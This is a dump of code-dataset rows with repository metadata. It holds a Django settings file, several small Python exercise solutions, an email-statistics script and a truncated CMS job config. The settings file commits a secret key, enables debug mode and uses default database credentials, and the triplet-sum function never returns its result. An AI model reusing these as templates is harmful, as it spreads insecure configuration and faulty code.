blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f30face88618b2e53b4b5aed2c70c8cffcfda98a | e2b2d81d1ea5beeb79d498dd4962fb5ed40e4678 | /settings.py | 322bb0ae98666366fece731a9d367f8abb04e868 | [] | no_license | palewire/dorling-cartogram-example | ddd70d3c310d323f3c896a473d032ccf67da182c | 4892546b9a97aa6de0c1f3f0fe6e130319ce8378 | refs/heads/master | 2021-01-19T20:16:26.152106 | 2011-10-04T04:26:30 | 2011-10-04T04:26:30 | 2,502,718 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,923 | py | # Django settings for project project.
import os
ROOT_PATH = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'dorling', # Or path to database file if using sqlite3.
'USER': 'postgres', # Not used with sqlite3.
'PASSWORD': 'postgres', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = 'http://palewire.s3.amazonaws.com/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '5um6b5gjouo_#2ymj1+_&y&pfm6aje8+mpg5%#=z&=1q31awgl'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
os.path.join(ROOT_PATH, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.gis',
'us_states',
'dorling',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [
"[email protected]"
] | |
3f2965e0c1071535736a0f8cee0a336628ca67e0 | 1385cf00f550ad38378227f62c49bb0cd05e1b04 | /leecode/easy/207/1365.py | 18f68a18946e06d936942586dac1d72c48b110fa | [] | no_license | liucheng2912/py | 4a09652fa52a1f92e8d8dd1239f9c128248fc10e | d40f73450fa65b8dd4d59d8d92088382fc573d2a | refs/heads/master | 2023-03-15T21:07:03.456017 | 2021-03-11T09:15:30 | 2021-03-11T09:15:30 | 334,900,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | py | '''
思路:
双重遍历
'''
def f(nums):
a=[]
for x in nums:
temp=0
nums1=nums[:]
nums1.remove(x)
for y in nums1:
if x>y:
temp+=1
a.append(temp)
return a
nums = [6,5,4,8]
print(f(nums))
| [
"[email protected]"
] | |
2bb29f3a8f5b1b7fbebbe190a039627e34f71d57 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_325/ch30_2019_08_26_19_33_38_456658.py | 856f9fb13cced922caa07303d99b2963d8c3cf61 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | import math
def jaca(v, o):
d = (((v**2.0)*math.sin(2.0*o))/9.8)
if d < 98.0:
return ("Muito perto")
elif d >= 98.0 and d <= 102.0:
return ("Acertou!")
else:
return ("Muito longe")
print(jaca(5.0, 45.0)) | [
"[email protected]"
] | |
bd3c614d453ba44555d79e289a0d4d923e611a74 | 9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612 | /exercises/1901050013/d11/main.py | 62fffbca9611008650d6ac289947ccf42f4a8d45 | [] | no_license | shen-huang/selfteaching-python-camp | e8410bfc06eca24ee2866c5d890fd063e9d4be89 | 459f90c9f09bd3a3df9e776fc64dfd64ac65f976 | refs/heads/master | 2022-05-02T05:39:08.932008 | 2022-03-17T07:56:30 | 2022-03-17T07:56:30 | 201,287,222 | 9 | 6 | null | 2019-08-08T15:34:26 | 2019-08-08T15:34:25 | null | UTF-8 | Python | false | false | 718 | py | import yagmail
import requests
import getpass
from pyquery import PyQuery
from mymodule.stats_word import stats_text_cn
response = requests.get('https://mp.weixin.qq.com/s/pLmuGoc4bZrMNl7MSoWgiA') # acquire the article link.
document = PyQuery(response.text)
content = document('#js_content').text() #acquire the article content.
result = str(stats_text_cn(content)) #convert the list type into string type.
sender = input('plese input your email address:')
password = getpass.getpass('please input your password:')
recipients = input('plese input the recipients:')
subject = input('please input the subject:')
yag = yagmail.SMTP(sender,password,'smtp.qq.com')
yag.send(to=recipients,subject=subject,contents=result) | [
"[email protected]"
] | |
2db42dee1688750e9f9b5361e4af2c9f36d228c3 | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/june_2021/walmart/10_triplet_sum_to_zero.py | e4e1d155945f4f6d79319f6ba48f01df9e967c5b | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | def triplet_sum_to_zero(nums, target):
def find_target_pair_sum(t, left):
first = left - 1
right = len(nums)-1
while left < right:
if nums[left] + nums[right] == t:
res.append((nums[first], nums[left], nums[right]))
left += 1
right -= 1
while left < right and nums[left] == nums[left-1]:
left += 1
while left < right and nums[right] == nums[right+1]:
right -= 1
if nums[left] + nums[right] > t:
right -= 1
else:
left+=1
nums.sort()
res = []
for i in range(len(nums)-1):
if i == 0 or nums[i] != nums[i-1]:
find_target_pair_sum(target-nums[i], i+1)
| [
"[email protected]"
] | |
5e5c4e2de7fe0b92d59fe49e8ed41262a8b5854a | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/22Jul/down/emb/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0_1374500587/HTT_22Jul_manzoni_Down_Jobs/Job_104/run_cfg.py | af465597ac04797342d557667927aeff1a2019b3 | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69,041 | py | import FWCore.ParameterSet.Config as cms
import os,sys
sys.path.append('/afs/cern.ch/user/m/manzoni/summer13/CMGTools/CMSSW_5_3_9/src/CMGTools/H2TauTau/prod/22Jul/down/emb/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0_1374500587/HTT_22Jul_manzoni_Down_Jobs')
from base_cfg import *
process.source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
inputCommands = cms.untracked.vstring('keep *',
'drop cmgStructuredPFJets_cmgStructuredPFJetSel__PAT'),
lumisToProcess = cms.untracked.VLuminosityBlockRange( ("190645:10-190645:110", "190646:1-190646:111", "190659:33-190659:167", "190679:1-190679:55", "190688:69-190688:249",
"190702:51-190702:53", "190702:55-190702:122", "190702:124-190702:169", "190703:1-190703:252", "190704:1-190704:3",
"190705:1-190705:5", "190705:7-190705:65", "190705:81-190705:336", "190705:338-190705:350", "190705:353-190705:383",
"190706:1-190706:126", "190707:1-190707:237", "190707:239-190707:257", "190708:1-190708:189", "190733:71-190733:96",
"190733:99-190733:389", "190733:392-190733:460", "190736:1-190736:80", "190736:83-190736:185", "190738:1-190738:130",
"190738:133-190738:226", "190738:229-190738:349", "190782:55-190782:181", "190782:184-190782:233", "190782:236-190782:399",
"190782:401-190782:409", "190895:64-190895:202", "190895:210-190895:302", "190895:305-190895:584", "190895:587-190895:948",
"190906:73-190906:256", "190906:259-190906:354", "190906:356-190906:496", "190945:124-190945:207", "190949:1-190949:81",
"191043:45-191043:46", "191046:1-191046:21", "191046:24-191046:82", "191046:84-191046:88", "191046:92-191046:116",
"191046:119-191046:180", "191046:183", "191046:185-191046:239", "191056:1", "191056:4-191056:9",
"191056:16-191056:17", "191056:19", "191057:1", "191057:4-191057:40", "191062:1",
"191062:3", "191062:5-191062:214", "191062:216-191062:541", "191090:1-191090:55", "191201:38-191201:49",
"191201:52-191201:79", "191202:1-191202:64", "191202:66-191202:68", "191202:87-191202:105", "191202:108-191202:118",
"191226:77-191226:78", "191226:81-191226:831", "191226:833-191226:1454", "191226:1456-191226:1466", "191226:1469-191226:1507",
"191226:1510-191226:1686", "191247:1-191247:153", "191247:156-191247:280", "191247:283-191247:606", "191247:608-191247:620",
"191247:622-191247:818", "191247:821-191247:834", "191247:837-191247:1031", "191247:1034-191247:1046", "191247:1049-191247:1140",
"191247:1143-191247:1187", "191247:1190-191247:1214", "191247:1217-191247:1224", "191248:1-191248:103", "191264:59-191264:79",
"191264:82-191264:152", "191264:155-191264:189", "191271:56-191271:223", "191271:225-191271:363", "191276:1-191276:16",
"191277:1-191277:28", "191277:30-191277:164", "191277:167-191277:253", "191277:255-191277:457", "191277:460-191277:535",
"191277:537-191277:576", "191277:579-191277:775", "191277:778-191277:811", "191277:813-191277:849", "191367:1-191367:2",
"191411:1-191411:23", "191695:1", "191718:43-191718:95", "191718:98-191718:207", "191720:1",
"191720:3-191720:15", "191720:17-191720:181", "191721:1", "191721:3-191721:34", "191721:36-191721:183",
"191721:186-191721:189", "191726:1-191726:13", "191810:15", "191810:22-191810:49", "191810:52-191810:92",
"191830:54-191830:242", "191830:245-191830:301", "191830:304-191830:393", "191833:1", "191833:3-191833:103",
"191834:1-191834:30", "191834:33-191834:74", "191834:77-191834:299", "191834:302-191834:352", "191837:1-191837:44",
"191837:47-191837:53", "191837:56-191837:65", "191856:1-191856:133", "191859:1-191859:28", "191859:31-191859:126",
"193093:1-193093:33", "193123:1-193123:27", "193124:1-193124:52", "193192:58-193192:86", "193193:1-193193:6",
"193193:8", "193193:11-193193:83", "193193:86-193193:120", "193193:122-193193:160", "193193:162-193193:274",
"193193:276-193193:495", "193193:497-193193:506", "193207:54-193207:182", "193334:29-193334:172", "193336:1-193336:264",
"193336:267-193336:492", "193336:495-193336:684", "193336:687-193336:729", "193336:732-193336:951", "193541:77-193541:101",
"193541:103-193541:413", "193541:416-193541:575", "193541:578-193541:619", "193556:41-193556:83", "193557:1-193557:84",
"193575:48-193575:173", "193575:176-193575:349", "193575:351-193575:394", "193575:397-193575:415", "193575:417-193575:658",
"193575:660-193575:752", "193621:60-193621:570", "193621:573-193621:769", "193621:772-193621:976", "193621:979-193621:1053",
"193621:1056-193621:1137", "193621:1139-193621:1193", "193621:1195-193621:1371", "193621:1373-193621:1654", "193834:1-193834:35",
"193835:1-193835:20", "193835:22-193835:26", "193836:1-193836:2", "193998:66-193998:113", "193998:115-193998:278",
"193999:1-193999:45", "194027:57-194027:113", "194050:53-194050:113", "194050:116-194050:273", "194050:275-194050:355",
"194050:357-194050:369", "194050:372-194050:391", "194050:394-194050:490", "194050:492-194050:814", "194050:816-194050:1435",
"194050:1437-194050:1735", "194050:1760-194050:1888", "194051:1-194051:12", "194052:1-194052:99", "194052:102-194052:166",
"194075:48-194075:101", "194075:103", "194075:105-194075:107", "194075:109", "194075:111",
"194076:1-194076:9", "194076:11-194076:55", "194076:58-194076:163", "194076:165-194076:228", "194076:230-194076:264",
"194076:267-194076:507", "194076:509-194076:527", "194076:530-194076:538", "194076:541-194076:562", "194076:565-194076:748",
"194108:81-194108:161", "194108:164-194108:264", "194108:266-194108:373", "194108:376-194108:396", "194108:398-194108:433",
"194108:436-194108:452", "194108:454-194108:577", "194108:579-194108:590", "194108:593-194108:668", "194108:671-194108:872",
"194115:66-194115:184", "194115:186-194115:338", "194115:340-194115:346", "194115:348-194115:493", "194115:496-194115:731",
"194115:819-194115:857", "194117:1-194117:38", "194119:1-194119:229", "194119:232-194119:261", "194120:1-194120:162",
"194120:165-194120:406", "194150:42-194150:127", "194150:129-194150:261", "194150:264-194150:311", "194151:47-194151:72",
"194151:75-194151:191", "194151:193-194151:238", "194151:240-194151:617", "194151:619", "194151:621",
"194151:623", "194153:1-194153:115", "194199:96-194199:227", "194199:229-194199:336", "194199:339-194199:402",
"194210:3-194210:195", "194210:198-194210:217", "194210:220-194210:359", "194210:361-194210:555", "194223:61-194223:112",
"194224:1-194224:126", "194224:129-194224:206", "194224:208-194224:250", "194224:253-194224:309", "194224:312-194224:386",
"194224:389-194224:412", "194225:1-194225:23", "194225:26-194225:47", "194225:49-194225:85", "194225:88-194225:149",
"194270:56-194270:68", "194303:56-194303:66", "194303:69-194303:102", "194304:1-194304:43", "194304:46",
"194305:1-194305:84", "194314:52-194314:130", "194314:133-194314:300", "194315:1-194315:10", "194315:13-194315:314",
"194315:317-194315:428", "194315:431-194315:452", "194315:455-194315:467", "194317:1-194317:20", "194424:63-194424:141",
"194424:144-194424:195", "194424:198-194424:266", "194424:268-194424:421", "194424:424-194424:478", "194424:481-194424:531",
"194424:534-194424:553", "194424:556-194424:706", "194424:708", "194428:1-194428:85", "194428:87-194428:122",
"194428:125-194428:294", "194428:296-194428:465", "194429:1-194429:4", "194429:7-194429:54", "194429:57-194429:147",
"194429:150-194429:411", "194429:413-194429:742", "194429:745-194429:986", "194429:988-194429:1019", "194439:46-194439:77",
"194439:79-194439:106", "194455:45-194455:64", "194455:67-194455:140", "194455:142-194455:255", "194455:293-194455:303",
"194464:1-194464:127", "194464:130-194464:142", "194464:145-194464:210", "194479:1-194479:44", "194479:165-194479:232",
"194479:235-194479:262", "194479:265-194479:374", "194479:377-194479:431", "194479:434-194479:489", "194479:492-194479:529",
"194479:531-194479:566", "194480:1-194480:32", "194480:34-194480:205", "194480:207-194480:375", "194480:377-194480:387",
"194480:389-194480:759", "194480:762-194480:956", "194480:959-194480:1402", "194533:46-194533:379", "194533:382-194533:415",
"194533:417-194533:618", "194533:620-194533:872", "194619:31-194619:110", "194631:1-194631:42", "194631:44-194631:100",
"194631:102-194631:169", "194631:171-194631:222", "194643:1-194643:287", "194644:1-194644:168", "194644:171-194644:181",
"194644:184-194644:185", "194644:187-194644:319", "194644:321-194644:421", "194691:61-194691:104", "194691:107-194691:155",
"194691:158-194691:251", "194691:254-194691:268", "194691:271-194691:272", "194691:275-194691:289", "194691:292-194691:313",
"194699:1-194699:30", "194699:32-194699:52", "194699:55-194699:64", "194699:67-194699:71", "194699:73-194699:154",
"194699:157-194699:215", "194699:218-194699:238", "194699:241-194699:259", "194702:1-194702:138", "194702:141-194702:191",
"194704:1-194704:41", "194704:44-194704:545", "194704:548-194704:592", "194711:1-194711:7", "194711:9-194711:619",
"194712:1-194712:56", "194712:61-194712:418", "194712:420-194712:625", "194712:627-194712:759", "194735:44-194735:71",
"194735:74-194735:101", "194735:104-194735:130", "194778:60-194778:118", "194778:120-194778:219", "194789:1-194789:18",
"194789:21-194789:32", "194789:34-194789:80", "194789:82-194789:166", "194789:168-194789:269", "194789:272-194789:405",
"194789:409-194789:414", "194789:417-194789:427", "194789:430-194789:566", "194790:1-194790:45", "194825:72-194825:117",
"194825:120-194825:221", "194896:34-194896:55", "194896:58-194896:79", "194896:82-194896:103", "194897:1-194897:6",
"194897:8-194897:78", "194897:80-194897:96", "194897:98-194897:102", "194912:53-194912:70", "194912:72-194912:96",
"194912:98-194912:444", "194912:446-194912:450", "194912:453-194912:467", "194912:470-194912:561", "194912:564-194912:660",
"194912:663-194912:813", "194912:815-194912:840", "194912:843-194912:864", "194912:866-194912:1004", "194912:1007-194912:1025",
"194912:1027-194912:1067", "194912:1069-194912:1137", "194912:1140-194912:1166", "194912:1168-194912:1249", "194912:1251-194912:1304",
"194912:1307-194912:1444", "194912:1447-194912:1487", "194912:1489-194912:1503", "194912:1506-194912:1662", "194914:1-194914:38",
"194915:1-194915:74", "195013:94-195013:144", "195013:146-195013:185", "195013:187-195013:206", "195013:208-195013:299",
"195013:302-195013:324", "195013:326-195013:366", "195013:369-195013:447", "195013:450-195013:526", "195013:528-195013:541",
"195014:1-195014:6", "195014:9-195014:119", "195014:121-195014:148", "195015:1-195015:13", "195016:1-195016:21",
"195016:23-195016:55", "195016:58-195016:63", "195016:65-195016:174", "195016:177-195016:184", "195016:186-195016:241",
"195016:243-195016:246", "195016:248-195016:251", "195016:254-195016:367", "195016:370-195016:422", "195016:425-195016:560",
"195016:563-195016:569", "195099:70-195099:144", "195099:147-195099:186", "195099:189-195099:208", "195099:211-195099:224",
"195099:227-195099:248", "195109:98-195109:241", "195112:1-195112:12", "195112:15-195112:26", "195113:1-195113:209",
"195113:212-195113:388", "195113:391-195113:403", "195113:406-195113:419", "195113:422-195113:492", "195113:495-195113:579",
"195114:1-195114:69", "195114:72-195114:103", "195115:1-195115:7", "195115:10-195115:22", "195147:132-195147:282",
"195147:285-195147:294", "195147:297-195147:331", "195147:334-195147:363", "195147:366-195147:442", "195147:445-195147:536",
"195147:539-195147:559", "195163:72-195163:138", "195163:140-195163:224", "195163:227-195163:240", "195163:243",
"195163:246-195163:347", "195164:1-195164:64", "195165:1-195165:4", "195165:7-195165:41", "195165:44-195165:54",
"195165:56-195165:153", "195165:156-195165:260", "195165:263-195165:266", "195251:1-195251:131", "195251:134-195251:137",
"195251:140-195251:152", "195251:154-195251:165", "195251:167-195251:242", "195303:109-195303:191", "195303:194-195303:277",
"195303:280-195303:310", "195303:312-195303:316", "195303:318-195303:409", "195304:1-195304:3", "195304:6-195304:22",
"195304:27-195304:80", "195304:83-195304:100", "195304:103-195304:154", "195304:157-195304:341", "195304:344-195304:588",
"195304:590-195304:727", "195304:729-195304:1003", "195304:1006-195304:1079", "195304:1083-195304:1140", "195304:1143-195304:1229",
"195378:90-195378:117", "195378:120-195378:127", "195378:130-195378:185", "195378:187-195378:204", "195378:206-195378:302",
"195378:305-195378:542", "195378:544-195378:565", "195378:567-195378:645", "195378:647-195378:701", "195378:703-195378:734",
"195378:737-195378:1120", "195378:1122-195378:1133", "195390:1", "195390:4-195390:27", "195390:30-195390:145",
"195390:147-195390:183", "195390:186-195390:187", "195390:190-195390:208", "195390:210-195390:213", "195390:215-195390:400",
"195396:49-195396:55", "195396:58-195396:63", "195396:66-195396:131", "195397:1-195397:10", "195397:12-195397:89",
"195397:92-195397:120", "195397:123-195397:141", "195397:143-195397:251", "195397:253", "195397:256-195397:475",
"195397:478-195397:525", "195397:527-195397:608", "195397:611-195397:776", "195397:779-195397:970", "195397:972-195397:1121",
"195397:1123-195397:1181", "195397:1184-195397:1198", "195397:1200-195397:1209", "195398:3-195398:137", "195398:139-195398:494",
"195398:497-195398:585", "195398:587-195398:817", "195398:820-195398:824", "195398:827-195398:1225", "195398:1228-195398:1307",
"195398:1309-195398:1712", "195398:1721-195398:1736", "195398:1741-195398:1752", "195398:1767-195398:1795", "195399:1-195399:192",
"195399:194-195399:382", "195530:1-195530:80", "195530:82-195530:104", "195530:107-195530:156", "195530:159-195530:300",
"195530:302-195530:405", "195540:68-195540:123", "195540:126-195540:137", "195540:140-195540:283", "195540:286-195540:319",
"195551:91-195551:106", "195552:1-195552:21", "195552:23-195552:27", "195552:30-195552:147", "195552:149-195552:155",
"195552:158-195552:182", "195552:185-195552:287", "195552:290-195552:349", "195552:352-195552:469", "195552:472-195552:815",
"195552:818-195552:823", "195552:825-195552:883", "195552:885-195552:1152", "195552:1154-195552:1300", "195552:1303-195552:1789",
"195633:40-195633:42", "195647:1-195647:41", "195649:1-195649:69", "195649:72-195649:151", "195649:154-195649:181",
"195649:183-195649:247", "195655:1-195655:129", "195655:131-195655:184", "195655:186-195655:260", "195655:263-195655:350",
"195655:353-195655:446", "195655:448-195655:483", "195655:485-195655:498", "195656:1-195656:362", "195658:1-195658:37",
"195658:40-195658:362", "195658:364-195658:382", "195658:384-195658:386", "195749:1-195749:8", "195749:10-195749:33",
"195749:36-195749:131", "195757:1-195757:82", "195757:85-195757:115", "195757:118-195757:161", "195757:163-195757:206",
"195758:1-195758:18", "195774:1-195774:13", "195774:16-195774:137", "195774:139-195774:151", "195774:154-195774:162",
"195774:164-195774:256", "195774:258-195774:276", "195774:279-195774:362", "195774:365-195774:466", "195774:469-195774:618",
"195774:620-195774:649", "195774:651-195774:830", "195775:1-195775:57", "195775:60-195775:100", "195775:103-195775:170",
"195776:1-195776:63", "195776:66-195776:283", "195776:286-195776:337", "195776:340-195776:399", "195776:401-195776:409",
"195776:411-195776:477", "195841:74-195841:85", "195868:1-195868:88", "195868:90-195868:107", "195868:110-195868:205",
"195915:1-195915:109", "195915:111-195915:275", "195915:278-195915:390", "195915:393-195915:417", "195915:419-195915:429",
"195915:432-195915:505", "195915:507-195915:747", "195915:749-195915:785", "195915:787-195915:828", "195915:830-195915:850",
"195916:1-195916:16", "195916:19-195916:68", "195916:71-195916:212", "195917:1-195917:4", "195918:1-195918:44",
"195918:46", "195918:49-195918:64", "195919:1-195919:15", "195923:1-195923:14", "195925:1-195925:12",
"195926:1", "195926:3-195926:19", "195926:21-195926:34", "195929:1-195929:29", "195930:1-195930:77",
"195930:80-195930:176", "195930:179-195930:526", "195930:529-195930:596", "195937:1-195937:28", "195937:31-195937:186",
"195937:188-195937:396", "195947:23-195947:62", "195947:64-195947:88", "195948:51-195948:116", "195948:119-195948:144",
"195948:147", "195948:150-195948:352", "195948:355-195948:369", "195948:372-195948:402", "195948:404-195948:500",
"195948:503-195948:540", "195948:543-195948:565", "195948:567-195948:602", "195948:605-195948:615", "195950:1-195950:71",
"195950:73-195950:138", "195950:141-195950:169", "195950:172-195950:332", "195950:335-195950:350", "195950:353-195950:382",
"195950:385-195950:421", "195950:424-195950:450", "195950:453-195950:483", "195950:485-195950:616", "195950:619-195950:715",
"195950:718-195950:787", "195950:789-195950:800", "195950:803-195950:829", "195950:831", "195950:833-195950:1587",
"195963:54-195963:58", "195970:44-195970:49", "195970:51-195970:85", "196019:54-196019:68", "196027:1-196027:55",
"196027:58-196027:119", "196027:121-196027:155", "196027:158-196027:186", "196046:12-196046:40", "196047:1-196047:64",
"196047:70-196047:75", "196048:1-196048:44", "196048:46-196048:48", "196197:58-196197:122", "196197:125-196197:179",
"196197:181-196197:311", "196197:313-196197:516", "196197:519-196197:562", "196199:1-196199:33", "196199:36-196199:83",
"196199:86-196199:118", "196199:121-196199:147", "196199:150-196199:237", "196199:239-196199:285", "196199:287-196199:534",
"196200:1-196200:68", "196202:3-196202:61", "196202:64-196202:108", "196203:1-196203:102", "196203:107-196203:117",
"196218:55-196218:199", "196218:201-196218:224", "196218:226-196218:393", "196218:396-196218:494", "196218:496-196218:741",
"196218:744-196218:752", "196218:754-196218:757", "196218:759-196218:820", "196239:1-196239:59", "196239:62-196239:154",
"196239:157-196239:272", "196239:274-196239:373", "196239:375-196239:432", "196239:435-196239:465", "196239:468-196239:647",
"196239:650-196239:706", "196239:709-196239:1025", "196249:63-196249:77", "196249:80-196249:99", "196250:1-196250:2",
"196250:5-196250:265", "196250:267-196250:426", "196252:1-196252:35", "196334:59-196334:111", "196334:113-196334:123",
"196334:126-196334:132", "196334:135-196334:167", "196334:170-196334:193", "196334:196-196334:257", "196334:259-196334:267",
"196334:270-196334:289", "196334:292-196334:342", "196349:65-196349:84", "196349:86-196349:154", "196349:157-196349:244",
"196349:246-196349:258", "196357:1-196357:4", "196359:1-196359:2", "196362:1-196362:88", "196363:1-196363:8",
"196363:11-196363:34", "196364:1-196364:93", "196364:96-196364:136", "196364:139-196364:365", "196364:368-196364:380",
"196364:382-196364:601", "196364:603-196364:795", "196364:798-196364:884", "196364:887-196364:1196", "196364:1199-196364:1200",
"196364:1203-196364:1299", "196437:1", "196437:3-196437:74", "196437:77-196437:169", "196438:1-196438:181",
"196438:184-196438:699", "196438:701-196438:1269", "196452:82-196452:112", "196452:114-196452:490", "196452:493-196452:586",
"196452:589-196452:618", "196452:622-196452:668", "196452:671-196452:716", "196452:718-196452:726", "196452:728-196452:956",
"196452:958-196452:1004", "196452:1007-196452:1091", "196453:1-196453:74", "196453:77-196453:145", "196453:147-196453:669",
"196453:673-196453:714", "196453:717-196453:799", "196453:802-196453:988", "196453:991-196453:1178", "196453:1180",
"196453:1182-196453:1248", "196453:1250-196453:1528", "196453:1531-196453:1647", "196495:114-196495:180", "196495:182-196495:272",
"196509:1-196509:68", "196531:62-196531:150", "196531:152-196531:253", "196531:256-196531:285", "196531:288-196531:302",
"196531:305-196531:422", "196531:425-196531:440", "198049:1-198049:11", "198049:14-198049:57", "198050:2-198050:155",
"198063:1-198063:37", "198063:40-198063:72", "198063:74-198063:124", "198063:127-198063:294", "198116:36-198116:52",
"198116:54-198116:55", "198116:58-198116:96", "198116:98-198116:112", "198207:1-198207:97", "198208:1-198208:92",
"198208:94-198208:134", "198208:137-198208:147", "198208:150-198208:209", "198210:1-198210:221", "198212:1-198212:574",
"198213:1-198213:107", "198215:1-198215:12", "198230:1-198230:33", "198230:36-198230:57", "198230:60-198230:235",
"198230:237-198230:324", "198230:326-198230:388", "198230:390-198230:459", "198230:462-198230:625", "198230:627-198230:651",
"198230:653-198230:805", "198230:808-198230:811", "198230:814-198230:948", "198230:950-198230:1090", "198230:1093-198230:1103",
"198230:1106-198230:1332", "198230:1335-198230:1380", "198249:1-198249:7", "198269:3-198269:198", "198271:1-198271:91",
"198271:93-198271:170", "198271:173-198271:299", "198271:301-198271:450", "198271:453-198271:513", "198271:516-198271:616",
